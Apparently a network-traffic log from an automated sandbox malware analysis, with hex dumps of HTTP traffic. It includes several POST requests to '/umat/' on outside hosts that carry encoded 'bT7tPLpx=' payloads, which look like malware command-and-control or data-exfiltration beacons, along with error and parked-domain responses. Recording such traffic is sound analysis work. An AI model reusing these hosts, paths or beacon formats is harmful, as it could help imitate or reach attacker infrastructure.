            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.theflysnare.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.theflysnare.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.theflysnare.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 46 41 78 58 36 52 6c 77 4f 61 28 51 6f 31 64 44 48 44 57 37 7a 43 44 64 7e 6d 55 6b 6e 32 47 75 78 4c 66 5f 28 64 6b 61 36 36 6f 71 54 47 6e 35 56 41 6a 70 73 6b 61 70 49 61 36 65 31 59 34 55 4b 56 6a 50 59 77 51 70 37 55 39 46 74 5a 57 6c 73 49 62 41 4d 38 63 7a 55 41 76 6c 67 51 35 51 62 32 50 70 64 42 76 4a 59 47 77 65 4e 62 45 4c 6f 6e 78 45 57 70 70 79 65 73 71 79 53 34 7a 4f 47 78 4e 57 7a 52 39 73 4b 77 78 74 52 57 4c 33 64 77 79 72 6c 71 53 5a 33 72 7e 36 6d 50 41 4a 51 70 37 67 65 46 68 6e 36 47 53 59 6c 58 35 7a 51 59 61 58 4e 4a 41 65 39 76 32 4b 48 4b 73 47 38 6c 45 54 58 56 48 62 34 48 36 4b 72 59 62 44 33 35 75 79 65 6a 52 52 62 4c 44 31 54 63 50 69 41 65 4d 7a 56 59 39 36 7e 6d 46 5f 56 64 52 47 66 6f 53 53 62 4a 71 4e 75 64 53 44 50 59 58 30 51 69 71 48 50 31 4f 56 4b 6c 53 49 38 38 34 6f 69 33 52 5a 73 45 4d 51 69 6c 69 65 54 70 4c 4c 42 35 28 49 36 4b 4d 53 59 44 34 63 77 79 62 78 48 72 34 6c 64 5f 48 4b 62 4f 78 4b 44 55 43 54 73 66 47 4a 57 72 4a 59 6d 6d 55 7a 52 6b 7a 36 42 58 56 4b 36 4d 66 58 56 4f 58 47 6e 30 7e 64 54 35 5a 64 57 39 64 4f 52 33 6b 31 6e 5a 74 71 47 34 68 54 50 50 63 62 30 57 5a 77 69 36 54 4c 55 69 37 58 47 2d 65 6b 32 52 37 77 64 76 64 53 76 55 56 50 4a 50 7a 69 76 42 28 34 41 6d 50 6c 69 4a 75 74 33 78 59 2d 31 76 33 52 6d 4a 59 79 69 36 49 4a 67 33 62 61 66 74 51 78 6e 4c 46 53 47 41 5a 48 39 42 61 6d 7e 6d 6e 36 48 52 4c 51 72 33 68 4f 39 75 71 4f 44 55 41 42 7a 58 34 64 33 39 76 4f 76 5f 78 69 6d 4f 61 79 6c 55 4d 30 73 34 4a 5f 36 67 7a 57 50 4b 70 55 62 31 71 64 31 30 7e 50 74 46 41 79 4d 79 71 61 4a 4b 74 79 30 4e 34 77 32 35 72 39 70 59 64 54 71 31 4c 49 79 75 7a 42 4f 31 77 56 58 4b 58 79 41 64 32 30 55 4f 39 66 59 39 6a 53 50 43 4d 33 44 32 33 37 61 30 6b 5a 6b 39 38 44 4b 76 67 4a 54 5a 65 43 68 6b 44 76 4e 61 44 39 34 46 7a 36 39 61 67 69 53 76 56 4c 34 36 7e 77 4f 44 6d 68 73 66 43 53 7a 66 73 79 71 49 45 37 5a 4c 31 6d 28 49 73 56 48 2d 6d 79 42 46 31 4f 35 43 6a 63 71 74 53 65 54 42 68 4d 7e 49 28 42 6b 47 39 64 6b 64 59 33 51 31 32 36 34 45 6b 57 4f 50 63 48 6b 70 70 54 65 6c 50 35 49 75 28 7a 4e 34 69 4a 54 43 52 4b 34 58 46 4c 66 68 45 64 4e 4a 4c 4c 6c 72 49 4f 31 54 4a 76 39 75 65 7a 56 68 70 46 44 49 48 6f 72 58 70 43 7a 57 28 38 4f 5a 4c 61 36 34 53 42 54 6c 50 5f 61 49 30 66 6f 63 75 41 53 51 6f 7a 6f 42 6b 6b 4c 53 7e 58 78 39 54 58 4d 37 51 4b 77 32 69 4c 37 38 72 59 78 39 45 32 77 73 6d 32 56 47 30 49 32 55 38 4c 67 4c 61 58 6b 62 30 5f 52 52 28 33 68 73 61 4f 4f 52 35 69 49 55 57 41 75 75 54 44 6e 61 7e 70 34 6b 78 6a 43 52 47 62 6b 42 33 48 41 45
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.huayugw.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.huayugw.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.huayugw.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 35 4e 37 74 4d 52 42 54 76 77 6f 6c 49 44 57 70 49 57 6e 64 64 46 70 4f 35 30 45 50 48 35 43 6c 4c 30 76 38 7a 79 33 32 39 55 56 55 7e 38 28 73 28 71 55 47 69 34 57 6a 38 4e 68 79 68 37 52 4f 28 46 66 67 6e 71 44 4f 42 45 65 54 64 49 52 62 47 53 68 5a 6f 58 72 69 42 37 77 47 57 6f 65 77 35 69 79 35 65 57 38 59 34 74 4e 76 78 45 75 4b 4d 76 68 6f 36 34 67 53 61 69 43 49 69 47 53 38 58 31 77 34 4e 4a 72 74 6c 4c 4e 6e 72 49 77 50 68 53 6d 71 65 4d 65 41 77 4e 72 77 7a 6f 76 5a 39 72 32 58 45 5f 4c 4b 4a 67 72 79 65 44 62 36 31 50 4e 79 72 4d 72 78 45 67 28 69 30 70 59 38 70 39 36 59 56 59 47 67 72 51 4c 4c 51 33 44 53 30 76 44 34 46 49 4c 30 35 46 37 58 6f 73 56 4d 70 78 6d 72 79 70 30 52 28 62 61 7a 75 7a 63 4a 56 4e 70 52 31 4a 36 5a 37 65 38 34 59 66 50 49 6e 41 45 53 36 51 54 67 35 41 6d 67 56 61 4f 50 43 45 52 37 37 33 57 48 42 7a 57 69 41 6c 4a 66 67 41 74 63 47 70 4d 5f 63 42 4a 5a 76 33 45 75 36 67 6a 55 49 61 77 4b 41 44 55 33 55 6e 7e 50 70 7a 4f 35 77 4c 72 34 4e 51 78 37 53 42 34 43 6d 61 32 36 67 63 57 36 37 5f 56 32 4c 65 50 5a 48 55 52 63 78 4e 31 2d 64 7a 44 36 79 69 6b 6c 52 68 34 2d 64 5f 39 34 30 43 70 6a 58 39 32 55 35 34 37 70 6c 64 6c 70 53 51 42 78 67 50 31 77 7a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=5N7tMRBTvwolIDWpIWnddFpO50EPH5ClL0v8zy329UVU~8(s(qUGi4Wj8Nhyh7RO(FfgnqDOBEeTdIRbGShZoXriB7wGWoew5iy5eW8Y4tNvxEuKMvho64gSaiCIiGS8X1w4NJrtlLNnrIwPhSmqeMeAwNrwzovZ9r2XE_LKJgryeDb61PNyrMrxEg(i0pY8p96YVYGgrQLLQ3DS0vD4FIL05F7XosVMpxmryp0R(bazuzcJVNpR1J6Z7e84YfPInAES6QTg5AmgVaOPCER773WHBzWiAlJfgAtcGpM_cBJZv3Eu6gjUIawKADU3Un~PpzO5wLr4NQx7SB4Cma26gcW67_V2LePZHURcxN1-dzD6yiklRh4-d_940CpjX92U547pldlpSQBxgP1wzw).
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.huayugw.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.huayugw.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.huayugw.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 35 4e 37 74 4d 51 52 5f 6b 54 38 34 47 7a 61 77 50 6b 47 61 46 46 5a 41 34 45 41 45 4c 5a 65 36 50 42 4c 77 73 47 28 4c 38 56 74 30 30 73 7a 42 37 70 6c 62 69 35 4b 4b 78 65 45 37 6b 62 64 4a 28 45 33 65 6e 71 48 4f 41 46 6e 4e 61 70 42 68 47 30 64 65 73 33 72 4f 43 37 78 59 53 71 72 53 35 69 33 4a 65 57 6b 49 34 64 5a 76 77 69 71 4b 46 49 4e 6a 6c 49 67 55 54 45 69 4d 68 32 4f 68 58 32 41 61 4e 4d 54 74 6c 37 42 6e 36 5a 41 49 31 6b 75 70 58 38 65 4a 38 74 72 54 38 49 6a 6e 39 71 43 6c 45 2d 6e 4b 4a 56 44 79 63 54 37 36 38 63 56 78 28 4d 72 4f 41 67 28 6b 69 70 56 69 70 39 6d 55 56 63 7e 57 71 67 76 4c 4b 6e 44 54 69 74 69 62 53 72 53 38 31 6c 4f 39 6f 73 4a 6c 71 6a 53 4a 79 6f 49 39 35 6f 7a 57 79 69 77 6e 56 50 6c 33 7a 70 36 64 76 75 38 6a 59 66 50 4f 6e 41 45 38 36 51 50 67 35 44 57 67 55 35 6d 50 54 45 52 34 78 6e 57 42 49 54 58 77 4b 46 46 39 67 42 45 35 47 73 77 46 66 7a 74 5a 70 6e 55 75 76 7a 37 56 41 61 77 45 45 44 56 31 48 33 28 59 70 7a 4f 62 77 4b 72 6f 4e 69 46 37 55 53 67 43 67 34 75 36 69 4d 57 36 6e 76 56 30 41 2d 7a 4a 48 55 4a 59 78 49 52 45 63 41 76 36 7a 33 77 6c 66 67 34 2d 52 76 39 34 68 53 6f 6e 52 4f 66 76 31 62 65 6e 73 37 5a 6d 56 6b 67 50 31 4e 30 56 75 46 75 47 44 73 58 50 44 36 7a 78 34 39 68 64 28 74 47 30 4a 49 28 45 58 4b 54 64 7a 64 53 44 4f 4a 6d 59 4b 52 54 68 7a 66 56 4d 74 34 56 63 54 4c 52 48 28 47 46 65 30 48 75 69 56 50 54 32 54 43 53 6c 76 57 74 54 7a 71 62 30 73 5f 64 33 6e 52 4a 33 59 31 59 70 39 6c 45 6d 7e 76 4f 38 59 49 48 56 72 58 79 72 61 62 70 69 35 51 48 32 71 47 55 64 7e 64 48 52 6e 50 7a 52 6e 35 66 44 50 73 43 39 41 46 50 33 4f 6c 59 4f 7a 31 34 77 31 6d 4c 77 36 61 47 75 58 63 54 4e 34 67 4c 45 66 53 68 41 70 38 41 76 47 68 41 65 6f 70 6c 34 70 4e 46 69 64 44 74 71 7a 66 55 49 6b 6b 56 34 28 56 7e 6b 35 43 31 4e 75 78 49 52 49 7a 56 66 77 5a 53 4a 32 47 47 6c 74 41 32 61 50 5f 30 32 28 50 4d 35 47 6a 34 48 49 5f 6b 34 42 64 67 52 6c 43 66 47 38 52 4a 37 4f 76 37 76 56 32 4d 65 56 53 66 34 77 45 43 68 36 36 7e 62 61 59 75 32 30 39 32 79 51 5f 28 4f 74 37 7e 45 77 74 52 68 70 5a 43 45 6d 6b 4a 34 71 79 73 58 46 30 4d 2d 79 44 28 54 43 64 41 73 4b 65 33 4c 68 50 72 38 50 44 59 70 79 6f 7e 41 68 68 6b 43 70 35 48 77 4e 76 55 4f 7e 66 32 76 4a 68 67 63 37 5f 41 73 39 68 4a 4e 70 4a 79 47 79 66 35 77 63 4f 72 5a 33 71 61 51 6e 41 67 6f 6d 48 42 35 35 31 53 58 6b 36 77 6e 79 6d 47 74 77 5a 6a 72 47 32 53 36 48 63 76 78 7e 43 65 45 6c 41 45 49 71 54 50 72 28 73 75 38 68 33 6c 54 74 74 6e 48 6a 33 46 39 70 73 36 71 54 2d 35 51 6b 33 41 41 39 48 52 51 34 7a 33 6d 66 78 64 51 32 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 03 Jun 2022 06:16:59 GMTConnection: closeContent-Length: 1259Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 6b 73 5f 63 5f 35 36 30 31 2d 31 39 38 37 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 c6 c4 c0 cf 20 b6 c7 b4 c2 20 b5 f0 b7 ba c5 cd b8 ae b8 a6 20 c3 a3 c0 bb 20 bc f6 20 be f8 bd c0 b4 cf b4 d9 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jun 2022 06:17:09 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 63 79 63 6c 65 73 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.shopcycles3.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 03 Jun 2022 06:17:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeD-Geo: EUContent-Encoding: gzipData Raw: 38 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e 41 0a 02 31 0c 45 af 92 13 58 66 1f 72 04 71 eb b2 63 c3 b4 50 9b 92 a4 8a b7 b7 58 c6 ed e7 bf ff 3e 66 7f 56 c2 cc 31 11 7a f1 ca 74 15 07 1b bd 8b 3a 27 0c 2b c4 b0 2a bb a4 0f e1 83 9b b3 4e 6c a3 bb 0c 85 5d e5 6d ac f0 62 b5 22 0d 8a 41 13 a8 d2 8e 19 fe b7 2e 70 ab 1c 8d 61 f4 43 63 62 70 01 cf 0c 35 3a 9b 9f f0 34 6d 84 e1 54 84 65 0c bf 9f 5f bc 2a 38 15 ae 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8a=A1EXfrqcPX>fV1zt:'+*Nl]mb"A.paCcbp5:4mTe_*80
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 03 Jun 2022 06:17:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeD-Geo: EUContent-Encoding: gzipData Raw: 38 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e 41 0a 02 31 0c 45 af 92 13 58 66 1f 72 04 71 eb b2 63 c3 b4 50 9b 92 a4 8a b7 b7 58 c6 ed e7 bf ff 3e 66 7f 56 c2 cc 31 11 7a f1 ca 74 15 07 1b bd 8b 3a 27 0c 2b c4 b0 2a bb a4 0f e1 83 9b b3 4e 6c a3 bb 0c 85 5d e5 6d ac f0 62 b5 22 0d 8a 41 13 a8 d2 8e 19 fe b7 2e 70 ab 1c 8d 61 f4 43 63 62 70 01 cf 0c 35 3a 9b 9f f0 34 6d 84 e1 54 84 65 0c bf 9f 5f bc 2a 38 15 ae 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8a=A1EXfrqcPX>fV1zt:'+*Nl]mb"A.paCcbp5:4mTe_*80
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 03 Jun 2022 06:17:26 GMTContent-Type: text/htmlContent-Length: 174Connection: closeD-Geo: EUData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 76 65 72 73 69 6f 6e 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 73 75 70 70 6f 72 74 65 64 2e 20 50 6c 65 61 73 65 20 75 70 67 72 61 64 65 20 74 6f 20 74 68 65 20 6c 61 74 65 73 74 20 76 65 72 73 69 6f 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Not supported</title></head><body><center><h1>Your browser version is no longer supported. Please upgrade to the latest version</h1></center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jun 2022 06:17:37 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jun 2022 06:17:37 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 